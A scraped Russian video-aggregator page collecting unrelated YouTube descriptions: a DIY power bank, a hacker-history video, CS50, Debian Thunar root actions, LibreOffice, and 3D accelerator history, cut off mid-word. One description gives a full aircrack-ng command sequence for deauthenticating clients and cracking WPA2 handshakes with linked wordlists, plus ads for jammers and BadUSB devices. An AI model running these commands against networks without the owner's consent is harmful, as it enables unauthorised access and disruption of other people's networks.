0.00
0 читателей, 4798 топиков

Самодельный Power Bank на 50.000 mAh.


Делаем самодельный Power Bank на 50.000 mAh.
===================================================
НА ЗАКАЗ НЕ СДЕЛАЮ!!! Покупайте на Али ali.pub/2my6bh
===================================================
Комплектующие.
DC-DC повышающий преобразователь 150W ali.pub/2jsrm8
DC-DC понижающий преобразователь 300W ali.pub/2mky4a
BMS-4S ali.pub/2es7ey
Аккумуляторы 18650 ali.pub/9sqpa ali.pub/0ek6x
Холдеры для 18650 ali.pub/2cy39w
====================================================
3D модель корпуса в inventor и файлы STL yadi.sk/d/-6p2O_X-3Yvrep
===============================================
Дай ссылку на свой 3D принтер, на got.by/2c6ooa
====================================================
Наша группа ВК vk.com/club125729960 ====================================================
Всё что мелькало в видео
Зажим (Крокодил) ali.pub/c7gbd
Imax B6 mini ali.pub/2mkzu4
Весы кухонные ali.pub/2mld3h
Коврик для пайки ali.pub/1qyw06
Мой паяльник ali.pub/1qyz2f
Флюс ali.pub/1qywer

====================================================
Канал подписчика давшего аккумуляторы www.youtube.com/c/electrovovka?disable_polymer=true
Урок про соединение аккумуляторов www.youtube.com/watch?v=9A3Ida-tWQs
Обзор держателей аккумуляторов 18650 (холдеров) www.youtube.com/watch?v=-EcX8ieuQdU
========================================================
Отблагодарить автора за его труд, чертежи и уроки:)
Яндекс.Деньги 410014334017254
money.yandex.ru/to/410014334017254
WebMoney (Z343563415592; R350733365372)
Bitcoin — 1ET2cmbjsKCMP98dKNj7NxqnR9T9djgqPd

Как ФБР Поймало Самого Разыскиваемого Хакера в Истории


По вопросам авторского права, пожалуйста, свяжитесь с нами по адресу: copymanager.mn@gmail.com
Реклама и сотрудничество: vk.com/club60235938?w=page-60235938_49750911

TechZone ► goo.gl/ULy98R

Компьютеры и цифровые технологии уже давно стали неотъемлемой и важной частью нашей жизни. Настолько важной, что на этом поле разгораются нешуточные битвы между разными людьми. И мы сейчас не о спорах в комментариях. Обладающие высоким интеллектом гениальные компьютерщики не всегда занимают сторону добра, становясь хакерами. Самое безобидное, что они могут сделать – взломать вашу почту или страницу в социальной сети. Но иногда их шалости заходят настолько далеко, что они становятся угрозой национальной безопасности, и их начинает разыскивать ФБР. В нашем видео мы расскажем вам о самых разыскиваемых хакерах в современной истории.

00:00 — Добро пожаловать!
00:43 — Commander X
02:34 — Гектор Монсегьюр
04:10 — Маркус Хатчинс
05:51 — Эрик Тэйлор
07:08 — Мартин Шкрели
07:59 — Cosa Nostra
09:00 — Кевин Митник

◓МН в ВК►https://vk.com/club60235938
◓РЕКЛАМА►https://vk.com/club60235938?w=page-60235938_49750911

1. CS50 на русском: Лекция #1 [Гарвард, Основы программирования, осень 2015 год]


Доп. материалы и задачи к лекции — javarush.ru/s/level_0
Весь курс CS50 — javarush.ru/s/course_cs50

Это Хогвартс? Нет, друзья, это Гарвард и первая лекция (Week 0) легендарного курса по основам программирования CS50 с русским переводом.

Даже на этом вводном занятии (хотя мозг отказывается воспринимать это яркое интерактивное действо как «занятие») @David Malan уже успел рассказать и показать много интересного.

Вот о чем:

• родной язык компьютеров — двоичная система счисления
• ASCII — как записываются символы
• как алгоритмизировать задачи — на живых примерах. Очень живых=)
• почему Дэвид разорвал телефонный справочник или что такое двоичный поиск
• сложность алгоритма — что, как и почему
• о том, что такое циклы, расскажет никто иной, как Марк Цукерберг, основатель Facebook
• …а еще вы увидите его же в 2005 году, в качестве приглашенного гостя CS50. Хм… судя по аудитории, интерес к технологиям вырос в десятки раз!

Подписывайтесь на наш канал, чтобы не пропускать лекции: www.youtube.com/channel/UCMcDsSeqS531-HKz6GiJgtA/featured

И не забывайте заниматься на JavaRush: javarush.ru

Перевод осуществлен cтудией VertDider совместно с JavaRush (http://javarush.ru).

Debian.ч6. Автомонтирование разделов. Добавляем строку в Thunar запуск от Root.


Настраиваем автомонтирование разделов и добавляем строку в Thunar запуск от Root.

Автомонтирование разделов и Thunar от Root
Автомонтирование разделов.
Установить пакет
sudo apt-get install ntfs-3g ntfs-config
Необходимы для работы с разделами NTFS
Автомонтирование разделов настроить программой Диски.

Добавляем строку в Thunar запуск от Root
Если не установлена, то установить утилиту gksu — sudo apt install gksu
В Thunar кликаем Правка-Особые действия- (добавить)
1 для запуска самого Thunar от root во вкладке Основное Имя пишем —
Открыть каталог от администратора. Описание тоже — Открыть каталог с правами администратора
Команда gksu thunar %f
Во вкладке Условия появления отмечаем Каталоги
2 для редактирования конфигов во вкладке Основное Имя пишем —
Редактировать от администратора. Описание тоже — Редактировать от администратора.
Команда gksu gedit %f
Или вместо gedit (его нужно до установить) вписать любой другой текстовой редактор, по умолчанию в Дебиане это Mousepad.
Команда gksu mousepad %f
Во вкладке Условия появления отмечаем Текстовые файлы и Другие файлы.

Теперь через правую клавишу мыши можно открыть конфиг для правки с правами администратора.

Посильная помощь каналу.
Яндекс деньги — money.yandex.ru/to/410019152018457
Карта Сбербанка — На странице сайта prostolinux.my1.ru/index/o_sajte/0-8

{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind


✓ Наш канал в Телеграме: durov.cc/under_public

ali.pub/35zes7 — Недорогой хакерский смартфон поддерживающий Kali Linux
youtu.be/ZJ0StG_o9yI — Лучший генератор словарей для брута

● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.

● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i

● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]

● Набор словарей:
goo.gl/z7mnhf — Даты, использовать первым
goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
goo.gl/bVsfo2 — Элитный словарь от InsidePRO
goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов

— ● Помочь каналу и получить помощь в любых вопросах: donationalerts.com/r/undermind
● Стать спонсором канала: youtube.com/TheUnderMind/join
● Я ВКонтакте: vk.com/TheUnderMind
● Реклама на канале: bit.ly/2THIswk

— ✓ Наш сайт: darksploit.su
✓ Наш второй канал: vk.cc/9Nuba7
✓ Паблик в ВК: vk.cc/aby9hC
✓ Чат в ВК: vk.cc/abxUPr
✓ Паблик в Телеграме: durov.cc/under_public
✓ Чат в Телеграме: durov.cc/UnderChats

— ● Лучшие товары для xaЦkера:

✓ Мой хаЦкepcкий смартфон для Kali Linux (Nethunter и поддержкой правильного ядра) — ali.pub/35zes7

✓ Alfa — Лучший WiFi Адаптер (работает в Kali Linux и Nethunter): goo.gl/sv7Vuf

✓ ХаЦкерские часы-деаутентификатор с WiFi: ali.pub/4hhw62

✓ НасkRF Оnе — лучший SDR: ali.pub/4hhwsm

✓ Маленькая Bluetooth-клавиатура с подсветкой: ali.pub/4hhwwp

✓ USB порт для вашего смартфона (OTG Micro USB): goo.gl/H7pLVT

✓ WiFi Jаmmеr на ESP8266 (Глушилка-Деавторизатор WiFi): goo.gl/i7VHWP

✓ Злo Кaбель (BadUSB): ali.pub/4hhyo3

✓ Raspberry PI 3 B (можно сделать xaцk-станцию): ali.pub/4hhwzt

✓ Ruby Ducky BadUSB (XaЦkepcкий девайс в виде флешки): ali.pub/4hhxn5

✓ USB to Ethernet адаптер: ali.pub/4hhxux

✓ Разветвитель USB порта 1 в 4: goo.gl/pBoQPW

✓ Дубликатор RFID ключей и карт: goo.gl/snvemZ

✓ Дубликатор RFID / NFC, редактор кодов: ali.pub/4hhy1q

✓ Недорогие, но очень мощные рации: goo.gl/dKibg5

✓ Недорогой, но мощный WiFi адаптер: goo.gl/c5eWga

✓ Микро камера: ali.pub/4hhy49

✓ Клавиатуры с подсветкой для ПК: ali.pub/4hhyav

✓ Коврик для мыши с подсветкой: ali.pub/4hhycm

— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.

● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…

● Дополнительные хештеги:
#взлом #wifi #вайфай #хак #hack #vk #взломать #kali #linux #under #андер #undermind

Знакомство с Libreoffice Writer (аналог Word)


Скачать Libreoffice: ru.libreoffice.org/download/

LibreOffice Writer это бесплатная и очень гибко настраиваемая программа для создания и редактирования текстовых документов с поддержкой таблиц, изображений, различного форматирования и мультимедиа. Это видео познакомит вас с LibreOffice Writer и поможет настроить программу для удобного использования. Рассматривается переключение между режимами интерфейса (классический, однострочный, вкладки, групповая лента, контекстный), настройка отображения документа, боковая панель, настройка панелей и размеров значков. Также показано, как сохранять документы в форматах Word (doc и docx).

История 3D-ускорителей (1996...2003)


Второе видео вокруг и около систем под процессоры с разъёмом Slot 1.
В этом видео я рассказываю про зарождение трёхмерной графики на ПК и о её аппаратном ускорении.
Начиная от 3Dfx Voodoo и заканчивая nVidia GeForce FX/ATI Radeon 9xxx.
Даты, техпроцессы, конвейеры, частоты и DirectXы.

Содержание:
01:34 — 3Dfx Voodoo Graphics (1996)
02:30 — nVidia Riva 128 (NV3, 1997)
02:47 — появление разъёма AGP
03:28 — ATI 3D Rage Pro (R3P, 1997)
04:22 — 3Dfx Voodoo2 (SST96, 1998)
06:46 — появление технологии SLI
09:01 — nVidia Riva TNT (NV4, 1998)
09:38 — ATI 3D Rage 128 GL (R4G, 1998)
12:00 — nVidia Riva TNT2 (NV5, 1999)
12:33 — 3Dfx Voodoo3 (Avenger, 1999)
13:26 — ATI Rage 128 Pro (R5, 1999)
14:44 — Transform